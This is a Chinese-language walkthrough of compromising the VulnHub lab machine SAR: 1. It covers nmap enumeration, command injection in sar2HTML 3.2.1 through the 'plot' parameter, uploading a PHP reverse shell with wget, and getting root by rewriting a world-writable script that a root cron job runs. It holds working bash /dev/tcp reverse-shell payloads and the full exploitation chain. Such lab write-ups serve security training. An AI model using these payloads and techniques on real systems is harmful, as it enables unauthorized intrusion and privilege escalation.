vulnhub 靶机渗透:SAR: 1


SAR: 1

https://www.vulnhub.com/entry/sar-1,425/

nmap 扫描

ip:192.168.54.13

# Nmap 7.93 scan initiated Tue May 16 09:18:11 2023 as: nmap --min-rate 20000 -p- -oN nmap/port 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:90:14:1A (VMware)

# Nmap done at Tue May 16 09:18:14 2023 -- 1 IP address (1 host up) scanned in 3.10 seconds



# Nmap 7.93 scan initiated Tue May 16 09:18:32 2023 as: nmap -sT --min-rate 20000 -p- -oN nmap/tcp 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.0014s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:90:14:1A (VMware)

# Nmap done at Tue May 16 09:18:35 2023 -- 1 IP address (1 host up) scanned in 3.12 seconds




# Nmap 7.93 scan initiated Tue May 16 09:18:45 2023 as: nmap -sU --min-rate 20000 -p- -oN nmap/udp 192.168.54.13
Warning: 192.168.54.13 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.54.13
Host is up (0.00048s latency).
All 65535 scanned ports on 192.168.54.13 are in ignored states.
Not shown: 65493 open|filtered udp ports (no-response), 42 closed udp ports (port-unreach)
MAC Address: 00:0C:29:90:14:1A (VMware)

# Nmap done at Tue May 16 09:19:22 2023 -- 1 IP address (1 host up) scanned in 37.06 seconds




# Nmap 7.93 scan initiated Tue May 16 09:18:52 2023 as: nmap -sV -p80 -oN nmap/services 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00028s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 00:0C:29:90:14:1A (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 16 09:19:00 2023 -- 1 IP address (1 host up) scanned in 7.74 seconds





# Nmap 7.93 scan initiated Tue May 16 09:19:07 2023 as: nmap -sC -p80 -oN nmap/script 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00025s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:90:14:1A (VMware)

# Nmap done at Tue May 16 09:19:13 2023 -- 1 IP address (1 host up) scanned in 5.92 seconds





# Nmap 7.93 scan initiated Tue May 16 09:19:39 2023 as: nmap --script=vuln -p80 -oN nmap/vuln 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00030s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /robots.txt: Robots file
|_  /phpinfo.php: Possible information file
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:90:14:1A (VMware)

# Nmap done at Tue May 16 09:20:11 2023 -- 1 IP address (1 host up) scanned in 32.31 seconds

80端口web渗透

在 robots.txt 中发现了 sar2HTML 这个路径;访问 http://192.168.54.13/sar2HTML,发现这是一个工具,页面上还直接给出了版本号 sar2html Ver 3.2.1。既然是带版本号的工具,就可能存在已公开的漏洞,去 searchsploit 搜一下。

# yunki @ yunki in ~/vulnhub/sar [9:25:41] C:130
$ searchsploit sar2html
----------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                         |  Path
----------------------------------------------------------------------------------------------------------------------- ---------------------------------
sar2html 3.2.1 - 'plot' Remote Code Execution                                                                          | php/webapps/49344.py
Sar2HTML 3.2.1 - Remote Command Execution                                                                              | php/webapps/47204.txt
----------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

搜到了 2 个 exploit,版本都与目标的 3.2.1 一致,逐个试试。

# yunki @ yunki in ~/vulnhub/sar [9:31:26] 
$ searchsploit -m 49344
  Exploit: sar2html 3.2.1 - 'plot' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49344
     Path: /usr/share/exploitdb/exploits/php/webapps/49344.py
    Codes: N/A
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/yunki/vulnhub/sar/49344.py



# yunki @ yunki in ~/vulnhub/sar [9:31:35] 
$ searchsploit -m 47204
  Exploit: Sar2HTML 3.2.1 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/47204
     Path: /usr/share/exploitdb/exploits/php/webapps/47204.txt
    Codes: N/A
 Verified: False
File Type: ASCII text
Copied to: /home/yunki/vulnhub/sar/47204.txt

先看看其中的 47204.txt,它是一份说明文档而不是可直接运行的脚本。


# yunki @ yunki in ~/vulnhub/sar [9:31:41] 
$ cat 47204.txt                       
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.%

在这里插入图片描述
命令执行成功了,说明该漏洞确实存在。再用另一个 py 脚本(49344.py)试试。

# yunki @ yunki in ~/vulnhub/sar [9:31:46] 
$ python3 49344.py
Enter The url => http://192.168.54.13/sar2HTML/
Command => ls
LICENSE
index.php
sar2html
sarDATA
sarFILE

Command => 

这个脚本相当于一个逐条执行命令的交互式 shell,但用起来不够方便,那我们改为获取一个反弹 shell。
kali

# yunki @ yunki in ~/vulnhub/sar [9:41:16] 
$ vim shell.txt                                                                                    

# yunki @ yunki in ~/vulnhub/sar [9:42:02] 
$ cat shell.txt   
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.54.128/443 0>&1'");?>

# yunki @ yunki in ~/vulnhub/sar [9:42:08] 
$ php -S 0:80          
[Tue May 16 09:42:11 2023] PHP 7.4.15 Development Server (http://0:80) started
[Tue May 16 09:42:37 2023] 192.168.54.13:44450 Accepted
[Tue May 16 09:42:37 2023] 192.168.54.13:44450 [200]: (null) /shell.txt
[Tue May 16 09:42:37 2023] 192.168.54.13:44450 Closing

靶机

Command => wget http://192.168.54.128/shell.txt -O shell.php

Command => ls
LICENSE
index.php
sar2html
sarDATA
sarFILE
shell.php

在 kali 上开启 443 端口监听,然后打开 http://192.168.54.13/shell.php(注意:按上面 ls 的输出,shell.php 实际保存在 sar2HTML 目录下,访问路径需相应调整),发现已经收到反弹 shell 了。

获得系统立足点

# yunki @ yunki in ~/vulnhub/sar [9:46:21] C:1
$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.13] 37552
bash: cannot set terminal process group (843): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ 

提权

www-data@sar:/var/www/html/sar2HTML$ ls -liah
ls -liah
total 164K
405734 drwxr-xr-x 4 www-data www-data 4.0K May 16 07:12 .
406326 drwxr-xr-x 3 www-data www-data 4.0K Oct 21  2019 ..
405911 -rwxr-xr-x 1 www-data www-data  35K Mar 14  2019 LICENSE
405981 -rwxr-xr-x 1 www-data www-data  53K Mar 19  2019 index.php
405908 -rwxr-xr-x 1 www-data www-data  52K Mar 19  2019 sar2html
426148 drwxr-xr-x 3 www-data www-data 4.0K Oct 20  2019 sarDATA
405912 drwxr-xr-x 3 www-data www-data 4.0K Mar 19  2019 sarFILE
401045 -rw-r--r-- 1 www-data www-data   76 May 16 07:12 shell.php
www-data@sar:/var/www/html/sar2HTML$ cd ..
cd ..
www-data@sar:/var/www/html$ ls
ls
finally.sh
index.html
phpinfo.php
robots.txt
sar2HTML
write.sh

www-data@sar:/var/www/html$ ls  -liah
ls  -liah
total 40K
406326 drwxr-xr-x 3 www-data www-data 4.0K Oct 21  2019 .
406325 drwxr-xr-x 4 www-data www-data 4.0K Oct 21  2019 ..
408197 -rwxr-xr-x 1 root     root       22 Oct 20  2019 finally.sh
405623 -rw-r--r-- 1 www-data www-data  11K Oct 20  2019 index.html
408195 -rw-r--r-- 1 www-data www-data   21 Oct 20  2019 phpinfo.php
400981 -rw-r--r-- 1 root     root        9 Oct 21  2019 robots.txt
405734 drwxr-xr-x 4 www-data www-data 4.0K May 16 07:12 sar2HTML
408199 -rwxrwxrwx 1 www-data www-data   30 Oct 21  2019 write.sh
www-data@sar:/var/www/html$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh

发现有一个以 root 权限执行的定时任务 finally.sh,每 5 分钟执行一次。

www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh

./write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh

touch /tmp/gateway
www-data@sar:/var/www/html$ ls -liah
ls -liah
total 40K
406326 drwxr-xr-x 3 www-data www-data 4.0K Oct 21  2019 .
406325 drwxr-xr-x 4 www-data www-data 4.0K Oct 21  2019 ..
408197 -rwxr-xr-x 1 root     root       22 Oct 20  2019 finally.sh
405623 -rw-r--r-- 1 www-data www-data  11K Oct 20  2019 index.html
408195 -rw-r--r-- 1 www-data www-data   21 Oct 20  2019 phpinfo.php
400981 -rw-r--r-- 1 root     root        9 Oct 21  2019 robots.txt
405734 drwxr-xr-x 4 www-data www-data 4.0K May 16 07:12 sar2HTML
408199 -rwxrwxrwx 1 www-data www-data   30 Oct 21  2019 write.sh

finally.sh 以 root 权限调用 write.sh,而 write.sh 的权限是 -rwxrwxrwx(777),属主为 www-data,当前用户可以直接修改它,于是把它的内容改成反弹 shell。

www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.54.128/4444 0>&1

然后在 kali 上监听 4444 端口,静静等待最多 5 分钟,定时任务触发后就得到了 root 权限的反弹 shell。

结束

root@sar:/var/www/html# whoami 
whoami
root

root@sar:/var/www/html# cd /root
cd /root
root@sar:~# ls
ls
root.txt
snap
root@sar:~# cat root.txt
cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99

root@sar:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:90:14:1a brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.13/24 brd 192.168.54.255 scope global dynamic noprefixroute ens33
       valid_lft 293sec preferred_lft 293sec
    inet6 fe80::c3cf:34f9:1c23:4932/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
       
root@sar:~# uname -a
uname -a
Linux sar 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux